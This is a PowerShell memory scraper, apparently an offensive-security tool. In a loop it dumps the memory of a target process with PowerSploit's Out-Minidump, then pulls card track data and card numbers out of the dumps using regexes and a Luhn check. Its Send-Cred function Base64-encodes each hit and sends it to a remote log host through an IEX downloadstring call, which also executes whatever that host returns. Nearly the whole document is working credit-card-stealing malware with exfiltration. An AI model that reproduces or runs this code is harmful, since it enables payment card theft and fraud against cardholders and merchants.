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<#
.DESCRIPTION
mem_scraper will continously dump memory of a specified process and search for
track data or credit card numbers.
.LINK
http://www.shellntel.com
.EXAMPLE
mem_scraper.ps1 -Proc iexplore -User bob
Description
-----------
scrapes memory of all IE processes owned by user 'bob'
.EXAMPLE
mem_scraper.ps1 -Proc -NumsOnly -Logging
Description
-----------
scrapes memory of all IE processes for card numbers and writes them to mem_output.txt log file
.EXAMPLE
mem_scraper.ps1 -Proc iexplore -User bob -Bin 123456 -LogHost 192.168.5.5
Description
-----------
Scrapes memory of all IE processes owned by user 'bob'.
Matches card numbers to specific BIN/IIN number
Base64 encoded results will be sent via http on port 80 to host 192.168.5.5.
#>
[CmdletBinding()]
Param (
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)]
[String]
$Proc,
[Parameter(Position = 1)]
[ValidateScript({ Test-Path $_ })]
[String]
$DumpFilePath = $PWD,
[Parameter(Mandatory=$false)]
[String]$LogHost,
[Parameter(Mandatory=$false)]
[string[]]$User,
[Parameter(Mandatory=$false)]
[Switch]$NumsOnly = $False,
[Parameter(Mandatory=$false)]
[Switch]$Logging,
[Parameter(Mandatory=$false)]
[String]$Bin
)
# sourced from the PowerSploit project: https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1
function Out-Minidump
{
<#
.SYNOPSIS
Generates a full-memory minidump of a process.
PowerSploit Function: Out-Minidump
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Out-Minidump writes a process dump file with all process memory to disk.
This is similar to running procdump.exe with the '-ma' switch.
.PARAMETER Process
Specifies the process for which a dump will be generated. The process object
is obtained with Get-Process.
.PARAMETER DumpFilePath
Specifies the path where dump files will be written. By default, dump files
are written to the current working directory. Dump file names take following
form: processname_id.dmp
.EXAMPLE
Out-Minidump -Process (Get-Process -Id 4293)
Description
-----------
Generate a minidump for process ID 4293.
.EXAMPLE
Get-Process lsass | Out-Minidump
Description
-----------
Generate a minidump for the lsass process. Note: To dump lsass, you must be
running from an elevated prompt.
.EXAMPLE
Get-Process | Out-Minidump -DumpFilePath C:\temp
Description
-----------
Generate a minidump of all running processes and save them to C:\temp.
.INPUTS
System.Diagnostics.Process
You can pipe a process object to Out-Minidump.
.OUTPUTS
System.IO.FileInfo
.LINK
http://www.exploit-monday.com/
#>
BEGIN
{
$WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')
$WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')
$Flags = [Reflection.BindingFlags] 'NonPublic, Static'
$MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)
$MiniDumpWithFullMemory = [UInt32] 2
}
PROCESS
{
$Process = $p
$ProcessId = $Process.Id
$ProcessName = $Process.Name
$ProcessHandle = $Process.Handle
$ProcessFileName = "$($ProcessName)_$($ProcessId).dmp"
$ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName
$FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)
$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,
$ProcessId,
$FileStream.SafeFileHandle,
$MiniDumpWithFullMemory,
[IntPtr]::Zero,
[IntPtr]::Zero,
[IntPtr]::Zero))
$FileStream.Close()
if (-not $Result)
{
$Exception = New-Object ComponentModel.Win32Exception
$ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))"
# Remove any partially written dump files. For example, a partial dump will be written
# in the case when 32-bit PowerShell tries to dump a 64-bit process.
Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue
throw $ExceptionMessage
}
else
{
Get-ChildItem $ProcessDumpPath
}
}
END {}
}
# luhn test code sourced from: http://scriptolog.blogspot.com/2008/01/powershell-luhn-validation.html
function Test-LuhnNumber([int[]]$digits){
[int]$sum=0
[bool]$alt=$false
for($i = $digits.length - 1; $i -ge 0; $i--){
if($alt){
$digits[$i] *= 2
if($digits[$i] -gt 9) { $digits[$i] -= 9 }
}
$sum += $digits[$i]
$alt = !$alt
}
return ($sum % 10) -eq 0
}
function Write-Log ($logstring, $color = "White")
{
$LogFile = "mem_output.txt"
$timestamp = Get-Date
if ($Logging)
{ Add-Content $LogFile -value "[$timestamp] - $logstring" }
else
{ Write-Host "[$timestamp] - $logstring" -ForegroundColor $color }
}
function Send-Cred($cred) {
if ($LogHost) {
$cred = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($cred.Value))
IEX (new-object net.webclient).downloadstring("http://$LogHost/$cred") -ErrorAction SilentlyContinue
}
}
function main {
# save mem dumps to present working directory
$dest = $PWD
$cardnumbers = @()
Write-Log "Starting Scraper"
while (1) {
if ($User) {
# we use wmi b/c its a v2 safe way of getting process owner
$process = (Get-WmiObject win32_process | where{$_.ProcessName -match $Proc})
$procs = @()
foreach ($p in $process) {
foreach ($u in $User) {
if ($p.getowner().User -eq $u) {
$p = Get-Process -Id $p.ProcessId
$procs += $p
}
}
}
}
else {
$Procs = Get-Process $Proc -ErrorAction SilentlyContinue #| Select -Property Responding
}
if ($Procs) {
Write-Log "Target process is running. Dumping memory..."
foreach ($p in $Procs) {
Out-Minidump -DumpFilePath $dest
}
$dumps = Get-ChildItem -Path $dest -Filter *.dmp | select FullName
foreach ($d in $dumps) {
Write-Log "Scraping memory dump: $($d.FullName)"
if ($NumsOnly) {
# find plain nums - WARNING: could result in a lot of false postives
$nums = (Select-String -Path $d.FullName -Pattern "(4[0-9]{15}|5[1-5][0-9]{14}|3[47][0-9]{13}|6(?:011|5[0-9]{2})[0-9]{12})" | foreach {$_.matches} | Select-String -NotMatch "(\d)\1{5,}")
}
else {
# we default to finding track data
$nums = (Select-String -Path $d.FullName -Pattern "\%B[\d]{16}[\^\w\s\/\d]+\?" | foreach {$_.matches})
}
foreach ($td in $nums) {
if ($cardnumbers -notcontains $td.Value) {
if ($NumsOnly) {
if ($Bin) {
if ($td -match $Bin) {
Write-Log "CARD NUM: $td" "green"
Send-Cred($td)
}
}
else {
# Luhn test our result before logging
if (Test-LuhnNumber([int[]][string[]][char[]]($td.Value))) {
Write-Log "POSSIBLE CARD NUM: $td" "green"
Send-Cred($td)
}
}
}
else {
Write-Log "TRACK DATA: $td" "green"
Send-Cred($td)
}
}
$cardnumbers += $td.Value
}
Write-Log "removing dump file: $($d.FullName)"
Remove-Item $d.FullName
}
}
else {
Write-Log "Target process not running"
}
sleep 10
}
}
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